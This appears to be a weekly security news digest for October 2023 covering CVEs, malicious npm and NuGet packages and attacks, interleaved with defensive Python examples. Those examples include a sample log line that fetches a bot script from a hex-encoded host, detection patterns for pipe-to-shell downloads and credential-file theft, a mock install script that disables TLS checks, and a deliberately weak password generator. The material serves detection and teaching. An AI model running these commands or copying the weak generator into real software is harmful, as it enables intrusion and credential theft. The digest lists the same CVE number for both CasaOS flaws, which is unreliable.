
how human behavior affects security


Programmer’s Digest #53

10/11/2023-10/18/2023 New Admin Takeover Vulnerability, Critical Vulnerabilities Uncovered in Open Source CasaOS Cloud Software, Malicious NuGet Package And More.

1. New Admin Takeover Vulnerability Exposed in Synology’s DiskStation Manager

A medium-severity flaw has been discovered in Synology’s DiskStation Manager (DSM) that could be exploited to decipher an administrator’s password and remotely hijack the account. The flaw, assigned the identifier CVE-2023-2729, is rated 5.9 for severity on the CVSS scoring scale. The problem is rooted in the fact that the software uses a weak random number generator that relies on the JavaScript Math.random() method to programmatically construct the admin password for the network-attached storage (NAS) device. Referred to as insecure randomness, it arises when a function that can produce predictable values, or doesn’t have enough entropy, is used as a source of randomness in a security context, enabling an attacker to crack the encryption and defeat the integrity of sensitive information and systems. Successful exploitation of such flaws, therefore, could allow the threat actor to predict the generated password and gain access to otherwise restricted functionality.
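The root cause above is a password built from a predictable PRNG. The following Python example (added here; not Synology's code, and it does not reproduce the DSM algorithm) puts a deliberately weak, seeded generator beside a hardened one that draws from the operating system CSPRNG, and computes the entropy bound of the result. The alphabet, password length and seed are constructed for the demonstration.

```python
import math
import random
import secrets
import string

# Alphabet for generated passwords (constructed choice; the page does not
# state which character set DSM uses).
ALPHABET = string.ascii_letters + string.digits


def weak_password(length: int, seed: int) -> str:
    """Deliberately insecure: a seeded, non-cryptographic PRNG (the role that
    JavaScript's Math.random() plays in the DSM flaw) yields a fully
    reproducible sequence, so anyone who recovers or guesses the seed
    regenerates exactly the same password."""
    rng = random.Random(seed)
    return "".join(rng.choice(ALPHABET) for _ in range(length))


def strong_password(length: int) -> str:
    """Hardened: the secrets module draws from the OS CSPRNG, so outputs are
    unpredictable even to an observer who has seen earlier outputs."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def entropy_bits(length: int, alphabet_size: int = len(ALPHABET)) -> float:
    """Upper bound on guessing work: log2(alphabet_size ** length) bits.
    Only meaningful when every symbol is drawn uniformly from a CSPRNG."""
    return length * math.log2(alphabet_size)


def demo() -> None:
    print("weak (seed 42):", weak_password(12, 42))
    print("weak (seed 42):", weak_password(12, 42))  # identical: predictable
    print("strong:        ", strong_password(12))
    print(f"entropy of 12 chars over {len(ALPHABET)} symbols: "
          f"{entropy_bits(12):.1f} bits")


if __name__ == "__main__":
    demo()
```

The two weak calls print the same string, which is the whole problem: the entropy figure only holds for the generator that cannot be replayed.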

2. Critical Vulnerabilities Uncovered in Open Source CasaOS Cloud Software

Two critical security flaws discovered in the open-source CasaOS personal cloud software could be successfully exploited by attackers to achieve arbitrary code execution and take over susceptible systems. A brief description of the two flaws is as follows –

  • CVE-2023-37265 – Incorrect identification of the source IP address, allowing unauthenticated attackers to execute arbitrary commands as root on CasaOS instances.
  • CVE-2023-37265 – Unauthenticated attackers can craft arbitrary JSON Web Tokens (JWTs) and access features that require authentication and execute arbitrary commands as root on CasaOS instances.

A consequence of successful exploitation of the aforementioned flaws could allow attackers to get around authentication restrictions and gain administrative privileges on vulnerable CasaOS instances.

3. Experts Warn of Severe Flaws Affecting Milesight Routers and Titan SFTP Servers

A severe flaw in Milesight industrial cellular routers, tracked as CVE-2023-43261 with a CVSS score of 7.5, has been discovered and may have been exploited in real-world attacks. This vulnerability, affecting several router models, allows unauthorized access to sensitive information and could let an attacker configure VPN servers and remove firewall protection. Evidence suggests that the flaw has been used on a small scale in the wild, with the attacker successfully authenticating on some systems using credentials extracted from httpd.log. Around 5% of internet-exposed Milesight routers are vulnerable to this issue, and the advice is to assume all credentials have been compromised and generate new ones while ensuring no interfaces are accessible from the internet to mitigate the risk.

4. Malicious NuGet Package Targeting .NET Developers with SeroXen RAT

A malicious NuGet package, mimicking a legitimate one, has been discovered delivering the SeroXen RAT. While the genuine package had nearly 79,000 downloads, the malicious version artificially inflated its download count to over 100,000. The threat actor published six other packages, with four posing as crypto service libraries for Kraken, KuCoin, Solana, and Monero but actually deploying SeroXen RAT. The attack occurs during installation through a PowerShell script that exploits deprecated behavior, allowing arbitrary commands. SeroXen RAT, available for $60, is a fileless RAT combining the functions of Quasar RAT, r77 rootkit, and NirCmd. The discovery highlights the exploitation of open-source ecosystems by attackers.

5. Microsoft Releases October 2023 Patches for 103 Flaws, Including 2 Active Exploits

In its October 2023 Patch Tuesday updates, Microsoft addressed 103 software vulnerabilities, including 13 Critical and 90 Important flaws, along with 18 in its Chromium-based Edge browser since September. Two zero-day vulnerabilities are of particular concern:

  • CVE-2023-36563 (CVSS score: 6.5) – An information disclosure flaw in Microsoft WordPad, potentially leaking NTLM hashes.
  • CVE-2023-41763 (CVSS score: 5.3) – A privilege escalation vulnerability in Skype for Business that could expose sensitive data, such as IP addresses and port numbers, granting access to internal networks.

Additionally, multiple vulnerabilities affecting Microsoft Message Queuing and Layer 2 Tunneling Protocol were fixed, which could lead to remote code execution and denial-of-service. A privilege escalation bug in Windows IIS Server (CVE-2023-36434) was addressed. An update for CVE-2023-44487 was released to mitigate HTTP/2 Rapid Reset attacks. Microsoft also deprecated Visual Basic Script, which has been exploited for malware distribution, and it will be removed from future Windows releases.

6. ShellBot Uses Hex IPs to Evade Detection in Attacks on Linux SSH Servers

Threat actors behind ShellBot are infiltrating poorly managed Linux SSH servers using hexadecimal IP addresses. They have altered their method of deploying ShellBot from a regular IP address to a hexadecimal value, aiming to avoid URL-based detection. ShellBot, also known as PerlBot, exploits servers with weak SSH credentials through dictionary attacks, serving as a conduit for DDoS attacks and cryptocurrency miners. The malware communicates with a command-and-control (C2) server via the IRC protocol. This change indicates ShellBot’s continued use for Linux system attacks. To counter this, users are advised to employ strong, regularly changed passwords to resist brute-force and dictionary attacks. Additionally, attackers are using abnormal certificates with exceptionally long strings in an attempt to distribute information-stealing malware. These malicious pages, often linked to illegal software, pose a threat to a wide range of users.
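The evasion described above works because a URL filter that matches dotted-decimal addresses does not recognise the same host written as a hex integer. The Python example below (added here; not code from the ShellBot research or any vendor) normalises IPv4 literals in URLs back to dotted-quad form so detection rules can compare them. It goes beyond the single form mentioned in the report and also handles a plain decimal integer and per-octet hex, since those are accepted by the same URL parsers. The log lines and addresses are constructed (documentation and private ranges).

```python
import ipaddress
import re
from typing import List, Optional, Tuple
from urllib.parse import urlsplit


def normalize_ip_literal(host: str) -> Optional[str]:
    """Return the dotted-quad form of an IPv4 literal written as dotted
    decimal, a single 32-bit hex integer (0xC0A80001), a single decimal
    integer (3232235521) or per-octet hex (0xC0.0xA8.0x0.0x1).
    Returns None for ordinary hostnames."""
    host = host.strip().lower()
    try:
        # Plain dotted decimal: ipaddress is strict and rejects every other form.
        return str(ipaddress.IPv4Address(host))
    except ValueError:
        pass
    # Whole address as one integer, hex or decimal.
    m = re.fullmatch(r"0x([0-9a-f]{1,8})|([0-9]{1,10})", host)
    if m:
        value = int(m.group(1), 16) if m.group(1) else int(m.group(2))
        return str(ipaddress.IPv4Address(value)) if value <= 0xFFFFFFFF else None
    # Four hex octets.
    parts = host.split(".")
    if len(parts) == 4 and all(re.fullmatch(r"0x[0-9a-f]{1,2}", p) for p in parts):
        return ".".join(str(int(p, 16)) for p in parts)
    return None


URL_RE = re.compile(r"https?://[^\s\"']+")


def find_obfuscated_hosts(lines: List[str]) -> List[Tuple[str, str]]:
    """Scan log lines for URLs whose host is an IPv4 literal in a non-standard
    encoding. Returns (host as written, normalized dotted quad) pairs."""
    hits: List[Tuple[str, str]] = []
    for line in lines:
        for url in URL_RE.findall(line):
            host = urlsplit(url).hostname or ""  # urlsplit lowercases the host
            norm = normalize_ip_literal(host)
            if norm and norm != host:
                hits.append((host, norm))
    return hits


# Constructed sample lines: one ordinary download, one using a hex-encoded host.
SAMPLE_LOG = [
    "Oct 12 03:14:07 host1 sh: wget http://203.0.113.7/update.tar.gz",
    "Oct 12 03:14:09 host1 sh: wget http://0xCB00710A/bot.pl",
]

if __name__ == "__main__":
    for written, normalized in find_obfuscated_hosts(SAMPLE_LOG):
        print(f"obfuscated host {written} -> {normalized}")
```

Feeding the normalised form into the existing IP reputation or egress rules closes the gap the hex notation exploits; the first sample line is not reported because its host already matches its canonical form.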

2023   digest   programmers'

Programmer’s Digest #52

10/04/2023-10/11/2023 Critical Atlassian Confluence Vulnerability, Linux Systems Vulnerable to RCE Attacks, Security Patch for Two New Flaws in Curl Library And More.

1. Microsoft Warns of Nation-State Hackers Exploiting Critical Atlassian Confluence Vulnerability

Microsoft has tied the recent critical flaw in Atlassian Confluence Data Center and Server, known as CVE-2023-22515, to a nation-state actor called Storm-0062 (aka DarkShadow or Oro0lxy). This vulnerability, a privilege escalation issue, enables the creation of unauthorized Confluence administrator accounts and has been exploited in the wild since September 14, 2023. Rated 10.0 on the CVSS severity scale, it affects various Confluence versions. Although the full extent of the attacks remains uncertain, Atlassian learned of the issue from a few customers, indicating that it was a zero-day exploit. Notably, Oro0lxy is a digital alias used by Li Xiaoyu, a Chinese hacker accused by the U.S. Department of Justice in July 2020 of infiltrating numerous companies, including Moderna, a COVID-19 vaccine developer, on behalf of the Ministry of State Security (MSS) in Guangdong.

2. HTTP/2 Rapid Reset Zero-Day Vulnerability Exploited to Launch Record DDoS Attacks

In August 2023, Amazon Web Services (AWS), Cloudflare, and Google disclosed mitigating unprecedented DDoS attacks that exploited the HTTP/2 Rapid Reset technique, tracked as CVE-2023-44487 with a CVSS score of 7.5. These layer 7 attacks flooded Google’s cloud infrastructure with up to 398 million requests per second, while AWS and Cloudflare experienced 155 million and 201 million RPS, respectively. HTTP/2 Rapid Reset exploits a zero-day flaw in HTTP/2, using the protocol’s multiplexing feature to send and cancel requests in quick succession, overwhelming servers. Notably, even a relatively small botnet of around 20,000 machines can execute such attacks. These DDoS attacks have become a significant threat, with HTTP/2 widely used across 35.6% of websites and 77% of web requests. Google observed multiple variants of Rapid Reset attacks, some more efficient than standard HTTP/2 DDoS attacks, making it a critical tool for threat actors.
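The attack pattern is client-sent RST_STREAM frames arriving immediately after each HEADERS frame, so the server does the work of a request without ever sending a response. The Python example below (added here; not code from Google, AWS or Cloudflare) shows two detection signals a server or proxy can compute from per-connection frame telemetry: a sliding-window count of resets and the ratio of cancelled to opened streams. The frame events, connection ids and thresholds are constructed for the demonstration.

```python
from collections import defaultdict, deque
from typing import Deque, Dict, Iterable, List, Tuple

# One HTTP/2 frame observation: (timestamp in seconds, connection id, frame type).
Event = Tuple[float, str, str]


def rapid_reset_suspects(events: Iterable[Event], window_s: float = 1.0,
                         max_resets: int = 100) -> List[str]:
    """Flag connections whose client-sent RST_STREAM frames exceed `max_resets`
    inside any sliding window of `window_s` seconds. The defaults are assumed
    thresholds for illustration, not values from the advisories."""
    recent: Dict[str, Deque[float]] = defaultdict(deque)
    flagged: List[str] = []
    for ts, conn, frame in sorted(events):
        if frame != "RST_STREAM":
            continue
        window = recent[conn]
        window.append(ts)
        # Drop resets older than the window so the count stays current.
        while window and ts - window[0] > window_s:
            window.popleft()
        if len(window) > max_resets and conn not in flagged:
            flagged.append(conn)
    return flagged


def reset_ratio(events: Iterable[Event]) -> Dict[str, float]:
    """Second signal: fraction of opened streams (HEADERS) that the client
    cancelled (RST_STREAM). A ratio near 1.0 means the client opens streams
    only to cancel them, which is the Rapid Reset pattern."""
    opened: Dict[str, int] = defaultdict(int)
    reset: Dict[str, int] = defaultdict(int)
    for _, conn, frame in events:
        if frame == "HEADERS":
            opened[conn] += 1
        elif frame == "RST_STREAM":
            reset[conn] += 1
    return {conn: reset[conn] / opened[conn] for conn in opened if opened[conn]}


def build_sample_events() -> List[Event]:
    """Constructed telemetry: one abusive connection that opens and at once
    cancels 500 streams within half a second, and one normal client."""
    events: List[Event] = []
    for i in range(500):
        t = i * 0.001
        events.append((t, "conn-A", "HEADERS"))
        events.append((t + 0.0005, "conn-A", "RST_STREAM"))
    for i in range(20):  # 20 requests over 10 s, 3 of them cancelled
        events.append((i * 0.5, "conn-B", "HEADERS"))
    for t in (1.2, 4.7, 8.9):
        events.append((t, "conn-B", "RST_STREAM"))
    return events


if __name__ == "__main__":
    sample = build_sample_events()
    print("suspects:", rapid_reset_suspects(sample))
    print("reset ratios:", reset_ratio(sample))
```

In a real deployment the response to a flagged connection is the mitigation the vendors describe: stop accepting new streams from that client or close the connection with GOAWAY, rather than only logging it.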

3. libcue Library Flaw Opens GNOME Linux Systems Vulnerable to RCE Attacks

A security flaw in the libcue library has been revealed, affecting GNOME Linux systems and posing a risk of remote code execution (RCE). Tracked as CVE-2023-43641 with a CVSS score of 8.8, this issue results from memory corruption in libcue versions 2.2.1 and earlier. The flaw resides in an out-of-bounds array access in the track_set_index function, enabling code execution when a victim downloads a .cue file from a malicious link. This vulnerability in libcue can be exploited with just one click, making it particularly concerning. Users are urged to install the latest updates, as further technical details are being withheld for security reasons. This disclosure follows a recent high-severity vulnerability in Google Chrome’s V8 JavaScript engine that also enabled RCE through visiting malicious sites, emphasizing the importance of prompt patching.

4. Security Patch for Two New Flaws in Curl Library Arriving on October 11

Curl library maintainers have warned of two upcoming security vulnerabilities to be addressed in the October 11, 2023, update. These are CVE-2023-38545 (high-severity) and CVE-2023-38546 (low-severity). Detailed information is withheld to prevent pre-release problem identification, but it affects versions over the past several years. Curl, a widely-used command-line data transfer tool, supports various protocols. CVE-2023-38545 impacts both libcurl and curl, while CVE-2023-38546 affects only libcurl. The vulnerabilities will be fixed in curl version 8.4.0. Users are advised to scan their systems using curl and libcurl, anticipating potentially vulnerable versions when details are disclosed in the release on October 11.

5. GitHub’s Secret Scanning Feature Now Covers AWS, Microsoft, Google, and Slack

GitHub is enhancing its secret scanning feature to validate tokens from services like AWS, Microsoft, Google, and Slack, alerting users to exposed tokens. This improvement builds on the validity checks introduced earlier this year for GitHub tokens and is planned to expand to more tokens in the future. To enable this feature, enterprise or organization owners and repository administrators can go to Settings > Code security and analysis > Secret scanning and select “Automatically verify if a secret is valid by sending it to the relevant partner.”

6. CISA Warns of Active Exploitation of JetBrains and Windows Vulnerabilities

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has updated its Known Exploited Vulnerabilities (KEV) catalog. Two new additions include:

  • CVE-2023-42793 (CVSS 9.8) – JetBrains TeamCity Authentication Bypass Vulnerability: This flaw allows remote code execution on TeamCity Server, with 74 unique IP addresses attempting exploitation.
  • CVE-2023-28229 (CVSS 7.0) – Microsoft Windows CNG Key Isolation Service Privilege Escalation Vulnerability: This high-severity issue enables specific SYSTEM privileges. While in-the-wild exploitation hasn’t been reported, a proof-of-concept (PoC) was shared.

Five vulnerabilities related to Owl Labs Meeting Owl have been removed due to insufficient evidence. Federal Civilian Executive Branch agencies must apply vendor-provided patches for the two actively exploited flaws by October 25, 2023, for network security. Microsoft has rated CVE-2023-28229 as “Exploitation Less Likely” and addressed it in April 2023 Patch Tuesday updates.

7. Cisco Releases Urgent Patch to Fix Critical Flaw in Emergency Responder Systems

Cisco has released updates to address a critical security flaw in Emergency Responder (CVE-2023-20101, CVSS 9.8). This vulnerability allows unauthenticated, remote attackers to log into affected systems using hard-coded credentials. The flaw results from static user credentials for the root account, typically used during development. Exploiting this flaw could grant attackers access to the system and the ability to execute arbitrary commands as the root user. The issue affects Cisco Emergency Responder Release 12.5(1)SU4 and has been resolved in version 12.5(1)SU5. Cisco detected this problem during internal security testing and is not aware of any in-the-wild exploitation. Customers are advised to update to the latest version to mitigate potential threats.

2023   digest   programmers'

Programmer’s Digest #51

09/27/2023-10/04/2023 New Linux Flaw, PyTorch Models Vulnerable, Urgent Hotfixes for Multiple Security Flaws in WS_FTP Server And More.

1. Looney Tunables: New Linux Flaw Enables Privilege Escalation on Major Distributions

A new Linux security vulnerability, named Looney Tunables (CVE-2023-4911, CVSS score: 7.8), has been found in the GNU C library’s dynamic loader. This vulnerability, discovered by Qualys, involves a buffer overflow when processing the GLIBC_TUNABLES environment variable. It was introduced in an April 2021 code commit. This library is critical to Linux systems, responsible for preparing and running programs.
Major Linux distributions like Fedora 37 and 38, Ubuntu 22.04 and 23.04, and Debian 12 and 13 are affected. An attacker with local access could exploit this flaw to execute code with elevated privileges. Red Hat has issued a mitigation that terminates setuid programs invoked with GLIBC_TUNABLES in the environment. Looney Tunables joins a growing list of privilege escalation vulnerabilities in Linux in recent years.

2. Warning: PyTorch Models Vulnerable to Remote Code Execution via ShellTorch

Researchers have uncovered critical security flaws in the PyTorch model-serving tool, TorchServe, which they’ve named ShellTorch. These vulnerabilities could potentially lead to remote code execution. Israel-based security firm Oligo made the discovery and warns that these flaws pose a serious risk to numerous services, including some major companies, as they allow unauthorized access and the insertion of malicious AI models. The vulnerabilities have been addressed in version 0.8.2. Exploiting these flaws could allow an attacker to upload a malicious model and execute arbitrary code without requiring authentication on a default TorchServe server. AWS has issued an advisory urging users to update to TorchServe version 0.8.2 if they are using specific PyTorch inference Deep Learning Containers.

3. Over 3 Dozen Data-Stealing Malicious npm Packages Found Targeting Developers

Almost three dozen counterfeit npm packages have been discovered by Fortinet FortiGuard Labs, posing a threat to developer systems. One group of packages, including @expue/webpack and @virtualsearchtable/virtualsearchtable, contains an obfuscated JavaScript file capable of collecting valuable data like Kubernetes configurations, SSH keys, and system metadata. Another set of modules, binarium-crm, career-service-client-0.1.6, hh-dep-monitoring, and orbitplate, unauthorizedly extracts source code and configuration files. Some packages use Discord webhooks for data exfiltration, while others automatically download and execute potentially malicious files from URLs. Notably, @cima/prism-utils disables TLS certificate validation, potentially exposing connections to adversary-in-the-middle attacks. Fortinet categorized these modules into nine groups based on code similarities and functions, with many using install scripts for data harvesting.
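Most of the packages described above do their harvesting from install scripts, so a pre-install audit of a package's lifecycle hooks catches the bulk of them. The Python example below (added here; not Fortinet's tooling or any npm feature) reads a package's files, lists the hooks npm runs automatically, and flags the behaviours the report names: Discord webhook URLs, disabled TLS certificate validation, references to Kubernetes or SSH credential paths, and remote fetch-and-execute. The package name, file contents and pattern list are constructed for the demonstration and are not exhaustive.

```python
import json
import re
from typing import Dict, List

# Lifecycle hooks that npm runs automatically during installation.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Review triggers drawn from the behaviours described above (constructed list).
SUSPICIOUS = {
    "discord_webhook": re.compile(r"discord(?:app)?\.com/api/webhooks", re.I),
    "tls_verify_disabled": re.compile(
        r"NODE_TLS_REJECT_UNAUTHORIZED\s*=\s*['\"]?0|rejectUnauthorized\s*:\s*false", re.I),
    "remote_fetch_and_run": re.compile(
        r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:sh|bash|node)\b", re.I),
    "secret_paths": re.compile(r"\.ssh/|\.kube/config", re.I),
}


def audit_package(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Given a mapping of path -> file contents (must include package.json),
    return each install-time hook with the reasons it deserves review."""
    pkg = json.loads(files["package.json"])
    scripts = pkg.get("scripts", {})
    findings: Dict[str, List[str]] = {}
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        reasons = ["lifecycle script runs automatically on install"]
        # Also inspect any local script the hook executes, e.g. "node setup.js".
        bodies = [cmd]
        for ref in re.findall(r"\bnode\s+([\w./-]+\.js)\b", cmd):
            bodies.append(files.get(ref, ""))
        blob = "\n".join(bodies)
        reasons += [name for name, pat in SUSPICIOUS.items() if pat.search(blob)]
        findings[hook] = reasons
    return findings


# Constructed sample: a package whose postinstall hook runs a local script.
SAMPLE_PACKAGE = {
    "package.json": json.dumps({
        "name": "example-utils",  # placeholder name, not a real package
        "version": "0.1.0",
        "scripts": {"postinstall": "node setup.js", "test": "node test.js"},
    }),
    "setup.js": (
        "process.env.NODE_TLS_REJECT_UNAUTHORIZED = '0';\n"
        "const report = 'https://discord.com/api/webhooks/0000/placeholder';\n"
        "const kube = require('os').homedir() + '/.kube/config';\n"
    ),
}

# Constructed sample with no install-time hooks at all.
CLEAN_PACKAGE = {
    "package.json": json.dumps({
        "name": "plain-lib", "version": "1.0.0",
        "scripts": {"test": "node test.js", "build": "tsc"},
    }),
}

if __name__ == "__main__":
    for hook, reasons in audit_package(SAMPLE_PACKAGE).items():
        print(f"{hook}: {', '.join(reasons)}")
    print("clean package findings:", audit_package(CLEAN_PACKAGE))
```

Running installs with `npm install --ignore-scripts` and only re-enabling scripts for packages that pass this kind of review removes the automatic execution path the report describes.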

4. Arm Issues Patch for Mali GPU Kernel Driver Vulnerability Amidst Ongoing Exploitation

Arm has released security patches to address a security flaw (CVE-2023-4211) in the Mali GPU Kernel Driver that’s being actively exploited. This vulnerability impacts various driver versions, allowing a local non-privileged user to gain access to already freed memory through improper GPU memory processing operations. Google has also identified targeted exploitation of this flaw. Arm has fixed the issue in specific driver versions.

In addition, Arm resolved two other vulnerabilities in the Mali GPU Kernel Driver:

  • CVE-2023-33200: Allows a local non-privileged user to exploit a software race condition, potentially accessing already freed memory.
  • CVE-2023-34970: Permits a local non-privileged user to make improper GPU processing operations, potentially accessing memory outside buffer bounds or exploiting a software race condition, leading to access to already freed memory.

5. Progress Software Releases Urgent Hotfixes for Multiple Security Flaws in WS_FTP Server

Progress Software has issued critical security hotfixes for eight vulnerabilities in WS_FTP Server Ad hoc Transfer Module and the WS_FTP Server manager interface. One of the flaws, CVE-2023-40044, with a CVSS score of 10.0, is particularly severe, allowing pre-authenticated attackers to execute remote commands. Other vulnerabilities include directory traversal (CVE-2023-42657), XSS (CVE-2023-40045 and CVE-2023-40047), SQL injection (CVE-2023-40046), CSRF (CVE-2023-40048), and authentication bypass (CVE-2023-40049). Rapid7 has observed instances of exploitation in the wild, emphasizing the importance of promptly applying the patches. Progress Software has been dealing with the aftermath of a major hack targeting its MOVEit Transfer platform since May 2023, affecting numerous organizations and individuals.

6. How to Impersonate a Service Account Using BigQuery Client Library

A service account in Google Cloud is a specialized account designed for applications and compute workloads, rather than human users. It’s identified by a unique email address. To make an application act like a service account, you connect it to the resource where it runs, like a Compute Engine instance. This allows the application to act on behalf of the service account. You can then grant the service account specific permissions (IAM roles) to access Google Cloud resources.
For scenarios requiring stricter permissions control, especially in multi-tenant deployments, Google Cloud offers Service Account impersonation. This feature allows for isolation of resource access controls for each organization or customer.
Impersonation enables authenticated principals (e.g., users or other service accounts) to assume the permissions of a service account. It’s particularly useful for short-lived token flows to avoid exposing service account credentials.
To implement Service Account impersonation with the BigQuery client library, you’ll need to use packages like google-cloud-bigquery and google-auth. More details and code samples can be found in Google Cloud’s documentation on Service Account impersonation.
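The short-lived token flow described above, as an added example (not Google's documentation sample): the caller's default credentials are exchanged for impersonated credentials of the target service account, and those are handed to the BigQuery client. It uses the `google-auth` and `google-cloud-bigquery` packages named above; the service account email, project id, lifetime and the email-format check are assumptions made for the demonstration, and the caller is assumed to hold `roles/iam.serviceAccountTokenCreator` on the target account.

```python
import re
from typing import List, Optional

# OAuth scope names published by Google.
CLOUD_PLATFORM_SCOPE = "https://www.googleapis.com/auth/cloud-platform"
BIGQUERY_READONLY_SCOPE = "https://www.googleapis.com/auth/bigquery.readonly"

# Assumed shape of a service account email: a 6-30 character account id and a
# 6-30 character project id, lowercase letters, digits and hyphens only.
SA_EMAIL_RE = re.compile(
    r"^[a-z][a-z0-9-]{5,29}@[a-z][a-z0-9-]{4,28}[a-z0-9]\.iam\.gserviceaccount\.com$")

MAX_LIFETIME_S = 3600  # IAM's default ceiling for impersonated token lifetime


def validate_target_principal(email: str) -> bool:
    """Reject anything that is not a service account email before we try to
    mint a token for it (a user email here would be a configuration error)."""
    return SA_EMAIL_RE.match(email) is not None


def validate_lifetime(lifetime_s: int) -> int:
    """Keep tokens short-lived; the point of impersonation is that the
    long-lived key never leaves the source identity."""
    if not 1 <= lifetime_s <= MAX_LIFETIME_S:
        raise ValueError(f"lifetime must be 1..{MAX_LIFETIME_S} s, got {lifetime_s}")
    return lifetime_s


def impersonated_bigquery_client(target_principal: str, project: str,
                                 scopes: Optional[List[str]] = None,
                                 lifetime_s: int = 300):
    """Return a BigQuery client that acts as `target_principal` using a
    short-lived impersonated token derived from the caller's credentials."""
    if not validate_target_principal(target_principal):
        raise ValueError(f"not a service account email: {target_principal}")
    validate_lifetime(lifetime_s)
    # Imports are deferred so the validation helpers work without the SDKs.
    import google.auth
    from google.auth import impersonated_credentials
    from google.cloud import bigquery

    # Source identity: whatever Application Default Credentials resolve to
    # (a user's gcloud login, or the attached service account on a VM).
    source_credentials, _ = google.auth.default(scopes=[CLOUD_PLATFORM_SCOPE])
    target_credentials = impersonated_credentials.Credentials(
        source_credentials=source_credentials,
        target_principal=target_principal,
        target_scopes=scopes or [BIGQUERY_READONLY_SCOPE],  # least privilege
        lifetime=lifetime_s,
    )
    return bigquery.Client(project=project, credentials=target_credentials)


if __name__ == "__main__":
    # Placeholder identifiers; replace with your own project and account.
    client = impersonated_bigquery_client(
        "bq-reader@my-project.iam.gserviceaccount.com", "my-project")
    for row in client.query("SELECT 1 AS ok").result():
        print(dict(row))
```

Scoping the impersonated token to `bigquery.readonly` and a few minutes of lifetime is what gives each tenant its own narrow blast radius: the source credentials never gain BigQuery permissions themselves, and a leaked token expires before it is useful.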

7. Cisco Warns of Vulnerability in IOS and IOS XE Software After Exploitation Attempts

Cisco has issued a warning about a medium-severity vulnerability (CVE-2023-20109) in its IOS Software and IOS XE Software. The flaw, with a CVSS score of 6.6, affects versions of the software with the GDOI or G-IKEv2 protocol enabled. An authenticated remote attacker with administrative control of a group member or key server could execute arbitrary code or crash the device. The issue stems from insufficient validation of attributes in the GDOI and G-IKEv2 protocols of the GET VPN feature. It could be exploited by compromising a key server or altering the configuration of a group member to point to an attacker-controlled key server. Cisco also disclosed five flaws in Catalyst SD-WAN Manager (versions 20.3 to 20.12) that could lead to unauthorized access, configuration rollback, information disclosure, authorization bypass, and denial of service. Customers are advised to update to a fixed software release to address these vulnerabilities.

2023   digest   programmers'